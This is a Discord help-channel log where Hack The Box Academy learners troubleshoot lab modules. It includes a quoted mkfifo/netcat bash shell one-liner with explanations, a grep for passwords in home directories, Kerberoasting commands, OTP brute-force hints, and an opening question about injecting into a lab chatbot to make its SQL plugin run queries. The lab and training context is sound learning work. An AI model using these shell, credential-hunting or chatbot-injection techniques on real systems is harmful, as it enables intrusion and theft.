I can successfully ||claim admin|| and the chatbot says ||SQLQuery plugin is available||, but I can't get it to actually execute queries.

Is there a specific format/syntax needed to trigger plugin execution, or should I be looking at a different attack vector entirely?

(I've tried ||username injection||, ||direct SQL after admin claim||, and various payload formats)

jovial whale
#

I'm currently stuck on the Identifying SSRF challenge in the Server-Side attacks module. I've identified some ports but can't access anything

prime mirage
steep helm
#

Hi guys, I'm trying to complete a module but I don't know why I do the right command but it doesn't work at all

humble hound
#

Can u post screenshot here?

prime mirage
#

I don't even have it yet

prime mirage
#

If you run

ip a
steep helm
prime mirage
#

In your machine connected to the vpn you should see an ip starting with 10.10.

steep helm
#

Yes I have it why?

#

I've also pinged the machine for the lab and replies

#

No packet loss

prime mirage
#

It's important to check that the previous steps to running the command work

steep helm
#

from this everything is ok

prime mirage
#

If you run nmap you see the port 80 too right?

steep helm
#

Yes

prime mirage
#

If you access from the browser you see the wordpress website?

#

If so share a screenshot of the command you are running and the output

steep helm
#

If I access from the browser I don't see the wordpress I see error 404

prime mirage
#

Ok first problem there

#

Can I see a screenshot of that?

steep helm
#

Nope sorry my bad I forgot to use https I see the wordpress site

prime mirage
#

Perfect

steep helm
#

My bad😵

prime mirage
#

That means it runs in port 443 not really 80

steep helm
#

yup

#

Also open

prime mirage
#

Ok also does it redirect you to a domain ending with .htb on the browser?

steep helm
#

Let me check

#

No

jovial whale
prime mirage
steep helm
#

I'll send you a screenshot

prime mirage
jovial whale
prime mirage
#

all of those with ftp protocol? did you tried http also?

#

3306 is mysql

jovial whale
#

What do you mean with "with ftp protocol"? I ran an ffuf scan and port 3306 and 34208 were found in addition to port 80

prime mirage
#

in the picture you shared in dm the payload starts with ftp://

#

that is the protocol

jovial whale
#

oh sry yeah no i had http there before just tried something chatgpt told me to do

#

didn't help though

prime mirage
prime mirage
jovial whale
#

yeah I know that but when i try to use the port in my request it says couldn't connect to server

prime mirage
#

yeah so SSRF means that you send a http request and that parameter inside the server makes another request

#

with the request that the server makes

#

did you fuzz ports?

jovial whale
prime mirage
#

and if you did, with ftp you can't get certain things

#

try for example http://

#

to the other port that is not mysql

prime mirage
# steep helm yes

I was talking to him, to help you I need you to share with me the output of the failed command

jovial whale
prime mirage
#

it's another error right?

#

can I see it

jovial whale
#

HTTP/1.1 200 OK
Date: Sun, 19 Oct 2025 17:50:59 GMT
Server: Apache/2.4.59 (Debian)
Vary: Accept-Encoding
Content-Length: 91
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Error (7): Failed to connect to 127.0.0.1 port 34208 after 0 ms: Couldn't connect to server

prime mirage
steep helm
#

How? I mean I can search on Internet

prime mirage
rustic sage
#

update the database manually first

#

then try it

steep helm
prime mirage
#

try what he suggested

rustic sage
#

i think this was it

rustic sage
#

my memory play with me sometimes

jovial whale
rustic sage
prime mirage
rustic sage
#

oh i see what hes doing

#

is this for ssrf?

prime mirage
#

yes

rustic sage
#

ah right yeah

jovial whale
prime mirage
#

on the body or the whole response?

jovial whale
steep helm
prime mirage
#

can I see

rustic sage
#

Imagine HTB does a networking certificate i would take it

jovial whale
rustic sage
steep helm
#

Not changed

rustic sage
steep helm
#

Is it normal that it take so long

rustic sage
#

just wait for it

steep helm
#

?

#

Ok perfect

rustic sage
prime mirage
#

from the pwnbox

prime mirage
#

@steep helm maybe try with --no-update parameter

#

the ping command is to confirm if you have internet access from the pwnbox I believe may not have but just to be sure the ping confirms

weak sun
#

Hello everyone. in brutus lab while i am opening wtmp file, i am getting a problem, any help?

weak sun
#

yes

potent linden
weak sun
prime mirage
# weak sun yes

that question that you asked you should ask it in that channel

#

since it belongs to a sherlock

#

not a module in the academy

prime mirage
#

good luck

steep helm
rustic sage
#

rq

#

reset everything

steep helm
#

Ok

rustic sage
#

do a fresh boot n stuff

steep helm
#

I'll try

rustic sage
#

ight

#

it's defo network related

#

it's timing out

#

i had issue with vm network restarted the whole vm and it worked again

prime mirage
prime mirage
weary crow
#

there's a hint saying that i should focus on api/v1/authentication/customers/passwords/resets/sms-otps endpoint it has no rate limiting but i still can figure out what to do next

steep helm
#

How...

prime mirage
#

because you have no internet

#

then you can't update

#

then it freezes

#

try with --no-update

#

the pwnbox I believe it has no internet access

steep helm
#

mmmm...

#

But then how it is possible that I can access internet?

prime mirage
#

with your machine is one thing, the pwnbox runs inside the htb vpn

steep helm
#

I use a VM with Oracle VirtualBox

#

Maybe I misconfigured the network adapter?

prime mirage
#

but you're using the pwnmachine of htb?

steep helm
#

yes

#

No wait, I'm using a virtual machine connected to the VPN of HTB

#

With the HTB target spwaned

prime mirage
#

well, wherever you ran the ping doesn't reach outside the vpn for some reason

steep helm
#

That's strange...

prime mirage
#

if is the same place you run wpscan you can see the problem that got you stuck

steep helm
#

It says destination unreachble

#

no route

#

Could it be the configuratiuon of the VPN wrong?

prime mirage
#

yeah that is why you have to troubleshoot everything from the beginning sometimes

#

ah that happened to me I remember

#

I had this problem multiple times

#

for some reason while I am connected to the vpn after running nmap with certain arguments my whole internet access is blocked

#

only solution I found is to reset my router to get assigned another public ip

prime mirage
steep helm
#

But did it affect the whole internet? So even using another device it was down?

prime mirage
#

no, with other devices everything is fine only in my machine

#

but I use baremetal arch

steep helm
#

Ah ok

prime mirage
fossil jacinth
#

Check /etc/resolv and put something like nameserver 8.8.8.8 in there @steep helm

prime mirage
# weary crow Hello 👋🏼

So I don't really know because I don't have that module but I imagine that maybe the goal is to somehow bruteforce the reset code? since it has no rate limit

steep helm
prime mirage
weary crow
steep helm
#

Found it

#

It says another bame server

prime mirage
steep helm
prime mirage
#

otherwise could be unpractical

fossil jacinth
#

Have you ever had internet connection on that vm ?

rustic sage
#

No he probably downloaded udp instead of tcp for vpn

steep helm
#

I don't know why now it does this

weary crow
rustic sage
#

is it TCP or UDP download?

fossil jacinth
#

It's not vpn related from what I have seen...He can't even ping google.com from what I have seen, right ?

rustic sage
#

wait he cant?

#

wtf

rustic sage
prime mirage
rustic sage
#

yeah it USED to happent o me

#

i had to restart the vm 24/7

#

it annoyed me

prime mirage
#

worst in my case that I don't use a VM

rustic sage
#

oh my LOpl

prime mirage
#

restarting the computer won't fix it

rustic sage
#

how did u fix it

rustic sage
#

oh right

fossil jacinth
#

What is in your /etc/resolv.conf ? Is there some nameserver line ?

prime mirage
#
└─▶ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 192.168.1.1
rustic sage
steep helm
#

Damn... Tomorrow I'll try now I have to go

prime mirage
rustic sage
#

i really need to do some ctf's i havent done it in a month i feel rusty probably

prime mirage
#

I don't remember but you can see it in my profile in htb website

rustic sage
#

ah yes

#

ok

fossil jacinth
#

I think I have about 50 or so

rustic sage
#

lemme see how much i got

prime mirage
steep helm
#

Thank you very much guys

prime mirage
#

for non module related

rustic sage
fossil jacinth
#

@steep helm try messing with systemctl network things next time. Read some online guides

rustic sage
#

im probably gonna do pro labs

fossil jacinth
#

First thing I would do though ... Comment out that line in your resolv.conf and add a new one with google's - nameserver 8.8.8.8 .. Or just change from 192.168.1.1 to the 8.8.8.8

weary crow
prime mirage
weary crow
prime mirage
#

And send me a ping around here in the future if you need help with something else

prime mirage
# weary crow how do i do that

In the htb website you go to labs and search user echoesofwhoami on the top right of the profile there is a button that says respect

#

You don't need to do that really only if you want

weary crow
#

i'll totally do it 🤘

#

🫡 🫡

prime mirage
#

Thanks

grand timber
terse sedge
#

I'm in Password Attacks - Skills Assessment - When trying to run secretsdump.py against the NTDS.dit & system.save files, I get no output at all.

rustic sage
#

it can be confusing at first, sometimes an actual video helps

sand jungle
#

hey, does anyone here have resolved Advanced SQL Injections skill assessment? im stuck on question 2

fickle thicket
crimson moon
#

exploiting thick client applications been following the steps mentioned for 4 days but the final jar file doesn't open. Please help

fathom pendant
crimson moon
#

after seeing the duration of the video got lazy and instead used AI now working lol.

fathom pendant
#

i mean the thick client part is ripped straight from the INSANE machine fatty

peak lagoon
civic fiber
#

Edit the code and to alert build number. and check the hint.

wicked apex
#

Module: Vulnerability assessment
Should i calculate a cvss score based on the finding alone
Or should I consider the entire attack chain and rate the finding itself?

||Say prob a privesc exploit via seimpersonate that only occurs after 2~3 dacl privilege abuse ||

lusty flint
lusty flint
fathom pendant
#

@mighty harness don't reveal information for skill assessments

mighty harness
fathom pendant
#

try just injecting a ' until it breaks

lusty flint
viral anchor
#

In: Active Directory Enumeration & Attacks : Kerberoasting - from Linux
Section: Listing SPN Accounts with GetUserSPNs.py

the wording says that valid credentials are needed to pull SPNs in the domain. in the lab exercise, running the command with no username or password still pulls the same list of usernames as with credentials. is this something unique to the lab or part of how this attack works?

this
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/

does the same as this
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

fossil jacinth
#

Probably there are credentials / tickets used in memory on the box where you execute these commands and so the DC can verify even if you don't specify those credentials

digital pendant
lusty flint
digital pendant
brave field
brave field
lusty flint
lusty flint
#

That command is just recursively checking all files within that directory and checking for the pattern pass. It’s pretty useful. It’s just throwing errors away if patterns don’t match or access issues

#

bash_history is like a text file with the history of commands used. So you can grep it. “.bash_history” hidden file under user’s home directory

waxen totem
#

you can do

grep 'pass' -Rni /home/ 2>/dev/null
#

it should show you the file name and line number

lusty flint
#

Ah as I said .bash_history usually lives in the user’s home directory.

If you do “ls -la” it’ll show it and use -n with grep to show line number

#

for example if user “test” exists under /home

cd /home/test
grep -ni “pass” ~/.bash_history

n=> should show line number that matches

i=> case-insensitive

#

You can also add -C 3

To show 3 lines above and below the matched line

woven zenith
#

👍 thanks.

lusty flint
short wolf
#

Hello. I have a minor user experience issue I encounted which related to the beta outlook of academy.
Should I just post it at here, or someone could tell me where should I go.
Thanks.

twilit gazelle
#

Hey
Can anyone tackle this
I'm using eternal romance and it says service start timed out, OK if running a command or non service executable...
Then exploit complete but no session was created

autumn pilot
#

On which module and section are you working

civic fiber
#

❤️

wide jungle
#

hello, I am kinda stuck on Attacking windows credential manager lab. I have bypassed UAC and ran mimikatz but the password is not the right one?? Where am I supposed to look?

orchid gust
#

Hello! I am new here and starting my journy, but unfortunatly hit a wall... I am currently in the segment Domain Name System (DNS) of Network foundations. I have awnsered all questions exept one:
What is checked first in the DNS resolution process when you enter a domain name into a browser? (Format: Two words)
That might be stupid, but i can not figure out what the correct awnser/format is. Could someone please enlighten me.

autumn pilot
#

There is a table with steps in the section, one of the steps has the answer

orchid gust
#

Yes you are righ, i read throug it all and my guess as well as the guess of other sources, the awnser should be local cach or local DNS. However, it seems that either its the wrong format, or i am really that stupid!^^

orchid gust
#

Issue solved! There has to be a very specific way how to write the awnser....

warm turret
#

Hello, on Active Directory Enumeration & Attacks -> LLMNR/NBT-NS Poisoning - from Windows i can not manage to make work the creds for the RDP . How can i get support for this?

autumn pilot
#

I have just tested the credentials for that section and target, and they are working as expected.

#

If you are using the built-in Remote Desktop Connection app in Windows (which apparently you are) you might need to specify the domain

#

Additionally, I would advise using a virtual machine or the provided workstation, if you are using your host OS to do the modules

warm turret
#

yah, i'll just use remina then. thanks

warm turret
sand jungle
#

If anyone reading this and struggling, dm me

barren salmon
spring root
#

module Active Directory Enumeration & Attacks in section Privileged Access at question What host can this user access via WinRM? (just the computer name) this gives the wrong answer? can someone pls help me out

mellow sky
#

Hi, there is a problem in Attacking Thick Client Applications in Attacking Common Applications module. I can't open powershell inside the machine that I connected with rdp which is required to open powershell as it shows in tutorial.
C:\Users\cybervaca\AppData\Local>powershell.exe
Windows PowerShell terminated with the following error:
The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
this is error

spring root
grim gust
fathom pendant
junior roost
#

Hello team

I am. Currently working on password attacks: pass the Hash module I am trying to get a rev shell I have followed through and I am still not getting the reverse shell what am I missing here my payload is good to go

fathom pendant
#

Are you sure that all the information for the payload is correct.

junior roost
#

You got a min lemme share my screen

fathom pendant
#

I don't do private dms like that, as I dont believe you have screenshare permissions in the other vcs

junior roost
#

Okay lemme share a screenshot

fathom pendant
#

Ah I see the issur

#

Are you running nc.exe on the target?

junior roost
#

yea

#

its in the MS01 Box /tools dir

fathom pendant
#

And the payload uses all the relevant ip information in order to connect back

junior roost
#

yea

fathom pendant
#

The 172.x.x.x ips, none of the ips should be 10.x.x.x

junior roost
fathom pendant
junior roost
#

its nc.exe

fathom pendant
#

Don't encode in base64

junior roost
#

ok

#

lemme try that

#

Boom

#

It worked thanks @fathom pendant

granite canopy
#

. nvm

steep helm
#

I don't know why guys, but I'm still having the same problem eve using the Pawnbox....

zenith token
#

Hey There
Brief question in Module "Attacking Web Applications with Ffuf"... In the skills Assessment Question 3.... Is this expected that instead of the proper port you have to write "PORT"? Took me like 30 min to figure this out sadglas

terse sedge
#

I'm in Password Attacks - Skills Assessment - When trying to run secretsdump.py against the NTDS.dit & system.save files, I get no output at all.

golden saddle
#

guys am i going insane?:

#

ive been using ctrl b % all my life XD

#

ohh forgot the shift lol because you need to press shift for %

carmine needle
#

Im just getting to the SQL Injection Fundamentals assessment, and when I go to visit the webpage I get a 400 bad request

#

Same error through my default browser, firefox, pwnbox, and burpsuite's browser

#

I cant find a thread of this happening historically but I'd love for this to be a simple issue

tired olive
#

is 'Junior Cybersecurity Analyst' the 'Penetration Tester' of blue team?

#

or is it 'SOC analyst'

fathom pendant
gray yacht
glad token
#

Can I get some help for API Attacks - Broken Authentication? I am trying to change the password for the htbpentester3@hackthebox.com using OTP, but I cannot get a successful change.

carmine needle
#

I'm not at desktop, but I do remember reading about the http vs https but then it started talking about the CA Certs and foxyproxy and i'm like "psh I got this"

glad token
brazen nacelle
#

I am just working on the module "Attacking Enterprise Networks" (section Internal Information Gathering) and have a problem while using nmap over proxychains. The same issue seems to be in other modules and in more discord postings, but I didn't find a solution. Everytime I use nmap to scan internal networks via proxychains it says "0 hosts up" and all ports are listed as filtered. Even within pwnbox and the official solution it doesn't work. The only difference I can see is, that the solution used proxychains 3.1 and I use 4. Any help for this problem? Btw.: With ligolo it works fine, but I also want to get it work via proxychains.

autumn pilot
#

Have you tried running it with sudo

south hound
#

Guys why are the machines not spawning?

brazen nacelle
# autumn pilot Have you tried running it with `sudo`

Yes. I tried: proxychains nmap -sT -Pn -p 21,22,23,3389 IP , proxychains sudo nmap ... , sudo proxychains nmap ... and even sudo proxychains sudo nmap .... The result is: Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds

hollow kernel
#

Use ligolo xD and your problems finish

haughty fiber
#

command injection skills assessment. I feel i'm at the final step but can't find the answer

#

/ is blacklisted but any substitutions are not working either

#

can anyone help

prime mirage
visual cove
#

Hello,
What is the flag in the first task in the web Requests module? It says I should curl inlanefreight.com/download.php for the flag but when I curl there is no flag

prime mirage
visual cove
#

Ok then how can I acces the flag

prime mirage
#

Keep trying, ask for help if you can provide context about the problem you're experiencing

visual cove
prime mirage
#

Also it should be related to hack the box modules

visual cove
#

Can you help me

prime mirage
#

Maybe

visual cove
#

It’s the module/35/section/219

prime mirage
#

I don't do modules, but I can help you troubleshooting

visual cove
#

Ok

prime mirage
#

Do you have internet access from the machine that you're trying to curl?

visual cove
prime mirage
#
ping 8.8.8.8 -c 4
#

Ok

#

If you curl the base url what do you get

#

Share screenshot if that helps

#

Is just so I can see the error

visual cove
#

If I use curl google.com it dose nothing but I can do curl -h

prime mirage
#

Do curl yo the base url that you want to reach and tell me the exact output

visual cove
#

There is no output

prime mirage
#

so if you try this you get no output?

visual cove
#

No output

prime mirage
#

can't access with the browser either?

visual cove
#

No

prime mirage
#

does the module provide you with an ip for the target site?

visual cove
#

Yes

prime mirage
#

do you have it under /etc/hosts ?

visual cove
#

No

prime mirage
#

if you access that ip with the browser or burp, do you get something?

#

or with curl

#

try curl and the ip

visual cove
#

Yes

#

I got it

#

Thx

prime mirage
#

great

#

anyway I would recommend to take a look of what does /etc/hosts

#

it may be helpful for some things

visual cove
#

Ok, I will remember that

teal frigate
#

Hey everyone!
Don't know if this is the right place to ask, if not please redirect me to the right channel.
I'm having issues spawning the target for Windows Attacks & Defense Module - Credentials in Shares it's stuck on an infinite loop, can someone help me with this? I was able to spawn a Pwnbox.

grim gust
#

What do we have to do ?

gray yacht
grim gust
#

I changed from eu-academy-6 to us-academy-4 and now it is working, thanks for the tip 👍

teal frigate
sly nebula
#

Module "Android Application Static Analysis", Section "Deobfuscating Code": the paranoid-deobfuscation Python module does not appear to be working anymore, thus impeding progress on this specific section. Are there any known workarounds or alternatives? @sick fulcrum

winter niche
#

Android Penetration Testing Automation module Drozer sub module, stuck here need help to solve this

devout lily
#

Hi everyone, can someone help me with the bind shell exercise in the dedicated module?

#

i have access using ssh, but i dont understand how to use those commands

#

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f i dont uderstand this command, and the Relationship with nc -nv 10.129.41.200 7777

sly nebula
#

/bin/bash -i: the next program is bash, a very popular shell interpreter. Here it is launched in interactive mode (-i), so it can read the appropriate configuration files (.bashrc in primis).

#

2>&1: fuse standard error into standard output, so both can pass through the pipe to the following program.
nc -l 10.129.41.200 7777 : whatever output/error bash produces, send it via TCP to 10.129.41.200:7777.

#

You will have to open a TCP server to receive the data. You can do this with nc -l -p 7777, for example.

#

Now you get data from bash, either the welcome message+prompt (first time it connects), or some command output (later). You write a new command and press ENTER. It will be sent as a response to the nc process.
> /tmp/f: whatever nc gets back from you (usually, a command) gets written to /tmp/f and the whole game starts again.
This is a reverse shell; it is called "reverse" because the flow of communication is inverted (your server is used to request bash command executions, the nc command that acts as a client is used to forward back the corresponding responses).

hasty mauve
#

for anyone who did the Kerberos Attacks skills assessment, how did you get capture the ticket?
krbrelayx doesn't work on target machine because there's a mismatch between it and impacket, deleting impacket also removes the ldapdomaindump library which krbrelayx needs.

devout lily
#

nc -l 10.129.41.200 7777 the -l option set a listener, so why do i use this command to connect to a listener (set with nc -l -p 7777) on the attacker host?

winter niche
#

Android Penetration Testing Automation module Drozer sub module, how to solve this?

brave field
# devout lily answer for this

nc -l 10.129.41.200 7777 = listen on that IP:port (run on target)

nc -nv 10.129.41.200 7777 = connect to that IP:port (run on attacker)

that long command creates a listener on the target (it binds nc -l to the given IP:port and hooks an interactive bash to it via the FIFO). You then connect from your machine with a normal netcat client (no -l)

hidden ledge
#

.

midnight laurel
#

Do you know why i am unable to get into the website for some of the challenges even after adding the IP into my /etc/hosts?

hidden ledge
#

Make sure your VPN is up

midnight laurel
#

Im connected to it.

hidden ledge
#

Then I don't know sorry, which chall is it ?

brave field
kind lance
#

Hi, I'm stuck on the Footprinting module -> SMB section -> Question 6.

I need to find the full system path for the sambashare. I've already tried all enumeration tools (enum4linux, smbmap, nmap scripts) but none of them show the path, and the hint is empty.

Can anyone who solved this recently point me in the right direction? Thanks!

cedar pilot
#

i want help for API Attacks Security Misconfiguration in question 2 i resend header with Origin = * but didnt response flag i used network after that edit headers and resend this after do it ' OR 1==1 --

#

can anyone help me

lusty flint
#

Might be a stupid question but is there a way to download all the precompiled binaries for windows from the Active Directory Module ?

To be more clear in the module when they give us access to a windows machine there are a set of tools under:
C:/Tools/

lusty flint
hasty mauve
#

Hell yeah, finally finished this beast.

https://academy.hackthebox.com/achievement/1442259/25

potent linden
hasty mauve
stuck grove
#

Hi i am sorry but is anyone except me facing issue to spawn windows target ?

#

to be more specific for module : Pivoting, Tunneling, and Port Forwarding and section: Port Forwarding with Windows Netsh

sly nebula
onyx atlas
stuck grove
#

thanks

kind lance
#

thanks guys

terse bloom
#

Hello, will I get banned if I gain a revshell on a public instance in modules?

carmine needle
#

I randomly tried manually typing in https (to sub http) and after clicking through a self-signed cert warning im at the site

#

didnt think that would work, but here we are

sly nebula
fathom pendant
fathom pendant
compact patrolBOT
grizzled schooner
#

Anyone available for a nudge on File Inclusions | Basic Bypasses?

fossil jacinth
#

Sure

grizzled schooner
#

Everything I'm attempting payload wise is either leading to illegal path specified! or just a blank page

fossil jacinth
#

Okay so you need to find some payload to bypass.

grizzled schooner
#

I've tried everything that I have - it mentions to combine payloads etc, which I feel I've done... I just don't know where to look at this point

fossil jacinth
#

Do you have an idea of which simple payload triggers this ?

grizzled schooner
#

triggers what? illegal path specified or a blank page?

fossil jacinth
#

The illegal

grizzled schooner
#

I've had it happen a couple of different ways

fossil jacinth
#

Focus on that maybe ? Try to bypass it ?

grizzled schooner
#

That's what I'm trying to do lol

fossil jacinth
#

Okay, you did mention the empty page though, didn't know where your focus lies.

#

Go through the module and try all mentioned payloads trying to bypass it.

rare condor
#

target is not spin up Meterpreter

fossil jacinth
#

Yep htb currently faces some issues, other people have reported not spawning machines.

grizzled schooner
crystal cove
#

Hi chat, I have a question regarding a LLMNR/NBT-NS/mDNS Poisoning, in the course, the attack steps say:

A victim device sends a name resolution query for a mistyped hostname (e.g., fileshrae).
DNS fails to resolve the mistyped hostname.
The victim device sends a name resolution query for the mistyped hostname using LLMNR/NBT-NS.
The attacker's host responds to the LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic, pretending to know the identity of the requested host. This effectively poisons the service, directing the victim to communicate with the adversary-controlled system.

Now why, me (the victim in this scenario and in real life) would ask some random server in my network to resolve the \fileshrae address ? Does a company need a dedicated LLMNR and NBT-NS server to address this ?

kind lance
#

Hello, I'm stuck on Question 4 of the DNS section in the Footprinting module (ACADEMY-FOOT-NIX01).

The task is to find the FQDN for the IP ending in ".203". This host is not in the AXFR zone transfer results. I have also completed a full gobuster brute-force with the 'subdomains-top1million-110000.txt' wordlist, and the host was still not found.

Has anyone solved this recently? I suspect the lab might be bugged or has been updated. Thanks.

fossil jacinth
#

What about the hosts given from the axfr ? @kind lance Tried enumerating them ?

acoustic owl
kind lance
#

@fossil jacinth Hey, thanks a lot for the hint! That was a great idea.

I tried to pivot and enumerate the hosts from the AXFR, starting with dc1, but it seems they are on a non-routable network (I got a host unreachable error).

After that, I tried everything else, including a brute-force with a large wordlist and even looked up the old community answer for this question, but nothing works. The lab seems to be bugged or was updated.

Thanks again for your help!

fossil jacinth
#

Truth be told I also struggled a bit there. Maybe it's been updated, not sure. Try maybe restarting the instance if you think it's bugged.

#

I do believe though that you are missing something.

kind lance
#

I changed the instance and it still gives the same result 🙁

ocean coral
#

So I’m having an issue with the responder module when I try to run the responder.py command

golden moat
#

Fundamentals - Android - Android Debug Bridge. Stuck!
So the other night I spent 3 hours grabbing Android Studio and the Emulator and working though the Debug Bridge questions.. was so tunnel vision on my laptop!
All to complete the last couple of sections within the Android Fundamentals Module.
Setup -
Windows laptop using Terminal with adb installed and re-pathed.
Pixel 3a XL 36.0 API
I have created my APK and have been able to upload it the the virtual pixel within AS. When trying to read the flag.txt it WILL NOT find the flag.txt file on the android sdcard.

I have reset everything. Recreated the apk signature and tried again. Narda.
Is there something I'm missing or an idea someone can float by me. Part of the steps it asks you to follow is to connect the android phone via USB.. how do I do this if its virtual!!
URL for context: https://academy.hackthebox.com/beta/module/195/section/2239

I'm at the point now where I really just want to complete the last sections of the Android Fundamentals so I can complete the OS Fundamentals module. I don't need to, my path will never really see me debug/pentest an android OS, just really want to complete it for my own sanity!

sturdy sandal
#

Hi all! Finished all the "fundamentals" modules but the measurement gauge remains at 98.44%. I reviewed all of them using the "all modules" filtered on "fundamentals" only and I haven't seen any missing answer even to optional questions. Anyone having the same results ?

sturdy sandal
fathom pendant
#

yeah

#

general is stuff that neither falls under offensive or defensive and i believe the modules are tagged that way

sturdy sandal
#

Thanks @fathom pendant done all of them except the Tier III "Android forensics", it should be the 1.56% I miss...

livid briar
#

Hi all, is this the correct place to seek help on a module? I am stuck on Pass the Certificate module in the CPTS track. When I try to do the module using the hosted attackbox, impacket-ntlmrelayx produces an error which looks its due to port 80 being used. (I kill the pid and the share stops) so I am attempting from a box I have in a VM, and now I don't get the error but I never seem to grab the cert. Just line after line of this. [*] SMBD-Thread-16 (process_request_thread): Received connection from 10.129.234.172, attacking target http://10.129.234.174 I have looked at some walkthroughs and all seem to indicate this SHOULD work but I cannot get it to grab the cert, any help would be appreciated.

hollow kernel
#

Hi
I have a question the last module in documentation and reporting and aen, are different penetretion tests?

cloud urchin
#

yeah

ocean coral
#

i'm have an issue reaching the websites the the three module not sure what i'm missing

waxen totem
winter niche
tidal mango
#

did the erratum channel get removed? Or am I just missing it somehow? I found an error that I was hoping to report?

brave field
autumn pilot
#

try to verify your account again

tidal mango
autumn pilot
#

You should get the Verified role

brave field
brave field
waxen totem
brave field
#

I think he copied the response from ChatGPT directly without understanding it

agile cedar
#

┌──(root㉿astra)-[/home/astra]
└─# xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:10.129.150.3 /cert-ignore
[12:21:01:689] [3780:3781] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: Asia/Kolkata
[12:21:02:700] [3780:3781] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[12:21:02:703] [3780:3780] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
, can anyone please tell me how to resolve this issue??

brazen nacelle
stuck hollow
#

On module API Attacks section Broken Authentication even fuzzing correctly ffuf don't find correct OTP. i also tried with wfuzz and same happens.

stuck hollow
prime mirage
#

I don't do modules so I don't have all the context

#

What are you trying to do exactly

humble hound
#

and yet u yap here

humble hound
#

re u sure you got the correct syntax? payload?
-# I dont do too, but can assume

brave field
stuck hollow
#

iv tried also without -t 100 and dont work

humble hound
#

hmm, i dont understand what Sh 22 and 23 is
but if it worked, mean the syntax was wrong? maybe share the command or screenshot?

are u here to complain things arent working as it should be? or need help fininshing it?

if its reporting there's some channel for it

stuck hollow
#

also copy paste from answer to check, and same happens

#

Ch 23 = character 23

humble hound
#

hmm, remove all filters use verbose mode on ffuf and see whats going on

humble hound
#

i cant find the channel where u can report mistakes
it was something called errarta

#

or just link me to that module, will check

stuck hollow
#

gonna take a look

#

on that channel

humble hound
#

yeah no it needs cubes xD
maybe someone else will help u

stuck hollow
#

oh ok thanks anyway

brazen nacelle
brave field
#

Did you try using -sT scan?

visual jasper
#

hellp I needed some help with Attacking Common Applications module, Attacking splunk

brazen nacelle
wooden seal
visual jasper
wooden seal
visual jasper
#

Not recieving reverse shell

flint folio
#

Hey, can anyone help me with Web Attacks Skills Assessment? ||I enumerated all users and reset their passwords but dunno how to spot the one with admin privs, no clear hint on descriptions and fetching index.php or settings.php gave no differences among users. I was expecting to find admin user with extra option/privilege option to submit data via XML and there XXE to retrieve the flag.||

eager spindle
devout lily
#

Hi everyone, can someone help me to undestand the difference between staged and stageless payloads?

solemn bluff
#

small typo/recent update:

technically lxc-utils is now part of lxc as of recent versions of debian/ubuntu distros

(in contanerization linux fundamentals section)

upper widget
#

Targets are not getting spawned on US vpn too...

upper widget
lapis burrow
upper widget
lapis burrow
upper widget
#

it is working

fathom pendant
# lapis burrow

Not all targets respond to pings, im assuming youre connected to the vpn